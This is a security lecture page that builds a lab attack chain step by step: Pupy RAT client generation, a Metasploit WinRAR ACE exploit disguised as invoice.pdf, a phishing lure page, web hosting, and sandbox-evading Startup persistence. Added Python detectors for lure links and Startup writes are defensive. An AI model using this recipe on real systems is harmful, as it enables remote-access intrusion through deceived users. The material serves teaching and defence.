Building Malware - Metasploit & Pupy RAT
by Coleman Kane
This lecture covered using Pupy RAT, Metasploit, and Kali to build malware for an attack.
Setting up Kali for Pupy RAT
The Pupy RAT tool is an open-source Remote Access Tool that was reportedly used in a 2017 attack against Saudi Arabian targets. The tool has extensive capabilities, as well as integrated Python support that makes it much easier for the adversary to extend and script.
You can visit the project's GitHub page to learn more: https://github.com/n1nj4sec/pupy
To replay the steps I used in the lecture, open Kali, bring up a terminal, and run the following commands, which are documented in Pupy RAT's install instructions.
    apt-get install git libssl1.0-dev libffi-dev python-dev \
        python-pip build-essential swig tcpdump python-virtualenv
    mkdir -p ~/tools/
    cd ~/tools/
    git clone --recursive https://github.com/n1nj4sec/pupy
    cd pupy
    python create-workspace.py -DG pupyw
    ..... wait for some time ...
Once complete, run the following command from inside ~/tools/pupy/pupyw to start the Pupy RAT shell:
    pupysh
Staging Additional Components for the Attack
Additionally, I want to pull down a copy of the WinRAR 5.61 installer, because in the scenario we pretend to trick the user into installing this version onto the Win 7 VM.
    wget -O ~/tools/pupy/pupyw/wrar561.exe https://www.rarlab.com/rar/wrar561.exe
Finally, I demonstrated an example HTML file intended to look like a message telling the target to install this package in order to view an invoice. The content of that HTML file is below; with the following command you can write it into ~/tools/pupy/pupyw/index.html:
    cat > ~/tools/pupy/pupyw/index.html << END
    <p>Below is the invoice you've requested</p>
    <p>Please use <a href="wrar561.exe">this tool</a> to view it, and get back to us.</p>
    <p><a href="invoice.pdf.ace">invoice.pdf</a></p>
    END
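From the defender's side, a lure page like the one above is recognizable by what its links point at: an installer, and a file whose name is built to look like a document (invoice.pdf) but actually ends in an archive extension (.ace). The scanner below is an added example for this lecture page, not part of the lecture or of Pupy; the extension lists and the copy of the lure HTML it runs over are constructed here for illustration, and the heuristic deliberately generalizes beyond the .exe/.ace pair the lecture uses to other executable, archive and decoy-document extensions.

```python
from html.parser import HTMLParser

# Extensions a browser hands to an installer or archive handler instead of rendering.
EXECUTABLE_EXTS = {".exe", ".msi", ".scr", ".bat", ".cmd", ".js", ".vbs", ".hta"}
ARCHIVE_EXTS = {".ace", ".rar", ".zip", ".7z", ".iso", ".cab"}
# Extensions commonly used as the decoy half of a double extension (invoice.pdf.ace).
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}

# Constructed copy of the lecture's lure page, used here as sample input.
LURE_HTML = """<p>Below is the invoice you've requested</p>
<p>Please use <a href="wrar561.exe">this tool</a> to view it, and get back to us.</p>
<p><a href="invoice.pdf.ace">invoice.pdf</a></p>
"""


class _LinkCollector(HTMLParser):
    """Collect the href target of every <a> tag (quoted or unquoted attribute values)."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def _extensions(target):
    """Lowercase suffix list of a link target: 'x/invoice.pdf.ace?v=1' -> ['.pdf', '.ace']."""
    name = target.split("?", 1)[0].split("#", 1)[0].rsplit("/", 1)[-1]
    parts = name.lower().split(".")
    return ["." + p for p in parts[1:]] if len(parts) > 1 else []


def find_suspicious_links(html):
    """Return (href, reason) pairs for links to executables, archives, or files whose
    document-looking name hides an executable/archive extension behind it."""
    collector = _LinkCollector()
    collector.feed(html)
    findings = []
    for href in collector.hrefs:
        exts = _extensions(href)
        if not exts:
            continue
        last = exts[-1]
        dangerous = EXECUTABLE_EXTS | ARCHIVE_EXTS
        if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and last in dangerous:
            findings.append((href, f"double extension: looks like {exts[-2]} but is {last}"))
        elif last in EXECUTABLE_EXTS:
            findings.append((href, f"link to executable ({last})"))
        elif last in ARCHIVE_EXTS:
            findings.append((href, f"link to archive ({last})"))
    return findings


if __name__ == "__main__":
    for href, reason in find_suspicious_links(LURE_HTML):
        print(f"{href}: {reason}")
```

Run against the constructed lure it reports both links: the installer as an executable download and invoice.pdf.ace as a double extension. The same check is cheap enough to run over a mail gateway's extracted HTML bodies or a proxy's fetched pages.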
Generate the Pupy RAT Backdoor
Once I have done all of the above, I switch the network from NAT over to Host-only networking mode. Once complete, I loaded up Pupy RAT using the pupysh command described above. To generate the malware EXE, I run the following command from within the shell, which creates the new file invoice.exe in the current directory (the pupyw directory, selected by -D .):
    gen -A x86 -O windows -f client -o invoice.exe -D .
Build the Exploit With Metasploit
Leave pupysh running and open a new terminal for Metasploit. Run the following commands in Metasploit (after waiting for it to start up) to package this up into an ACE archive exploit:
    use exploit/windows/fileformat/winrar_ace
    set CUSTFILE invoice.exe
    set FILENAME invoice.pdf.ace
    set payload generic/custom
    exploit
Once you run the exploit command, the new ACE archive is written to ~/.msf4/local/invoice.pdf.ace. Use another shell to copy it into the pupyw staging directory:
    cp ~/.msf4/local/invoice.pdf.ace ~/tools/pupy/pupyw
Hosting the Attack for Delivery
Finally, we used SimpleHTTPServer, run from the pupyw staging directory, to host all of this on a web server listening on port 80, to which we direct the victim VM:
    python -m SimpleHTTPServer 80
Exploiting the Victim
Next we configure the Windows VM with Host-only networking using the same virtual interface as the Kali VM.
We have Internet Explorer visit the page and follow the directions and hyperlinks: install WinRAR, then save and extract the ACE archive. WinRAR writes the malware into the user's Startup folder, so it will start the next time the user logs on or reboots. This has the added benefit of minimizing the behavior that runs automatically inside an automated sandbox, while still being relatively reliable: the user is likely to log out or reboot their machine sometime within the next week.
Once the user is logged back in after a reboot or sign-out, the malware connects to the Pupy RAT shell, and we can use all of the commands and modules therein to explore the victim VM. Note that this attack would likely work on a Windows 10 system as well, though some behaviors might be identified as suspicious if Windows Defender is enabled.
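The persistence step is also the most visible one for a defender: an archive utility has no business creating files in a Startup folder, regardless of what the archive claims its contents are. The detector below is an added example for this page, not part of the lecture, Pupy or Metasploit. It assumes file-create telemetry reduced to simple records with the writing process image and the created path (the record shape and the sample events are constructed here; the two Startup folder locations are the standard per-user and all-users Windows paths), and flags any writer outside a small constructed allow-list.

```python
import ntpath

# Standard Windows Startup folders (matched case-insensitively, any drive or user profile).
STARTUP_MARKERS = (
    "\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup",
    "\\programdata\\microsoft\\windows\\start menu\\programs\\startup",
)

# Constructed baseline of processes expected to create Startup entries in this environment.
ALLOWED_WRITERS = {"explorer.exe", "msiexec.exe"}

# Constructed file-create events: 'image' is the writing process, 'target' the file created.
SAMPLE_EVENTS = [
    {"image": "C:\\Program Files\\WinRAR\\WinRAR.exe",
     "target": "C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\invoice.exe"},
    {"image": "C:\\Program Files\\WinRAR\\WinRAR.exe",
     "target": "C:\\Users\\victim\\Downloads\\invoice.pdf"},          # ordinary extraction
    {"image": "C:\\Windows\\explorer.exe",
     "target": "C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\notes.lnk"},
    {"image": "C:\\Windows\\System32\\cmd.exe",
     "target": "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\update.bat"},
]


def _normalize(path):
    """Lowercase and use backslashes so forward-slash variants match the markers too."""
    return path.replace("/", "\\").lower()


def is_startup_write(event):
    """True when the created file lives inside either Startup folder."""
    target = _normalize(event["target"])
    return any(marker + "\\" in target for marker in STARTUP_MARKERS)


def flag_startup_persistence(events):
    """Return the events in which a non-allow-listed process drops a file into a Startup
    folder, each annotated with the writer's image name."""
    flagged = []
    for event in events:
        if not is_startup_write(event):
            continue
        writer = ntpath.basename(event["image"]).lower()
        if writer in ALLOWED_WRITERS:
            continue
        flagged.append({**event, "writer": writer})
    return flagged


if __name__ == "__main__":
    for hit in flag_startup_persistence(SAMPLE_EVENTS):
        print(f"{hit['writer']} wrote {hit['target']}")
```

Over the constructed events it flags the WinRAR write of invoice.exe and the cmd.exe write to the all-users folder, and ignores both the ordinary extraction into Downloads and the explorer.exe shortcut. Because the trigger is a Startup-folder write and not a process launch, the alert fires at extraction time, before the logoff or reboot the lecture relies on to delay the RAT's first execution.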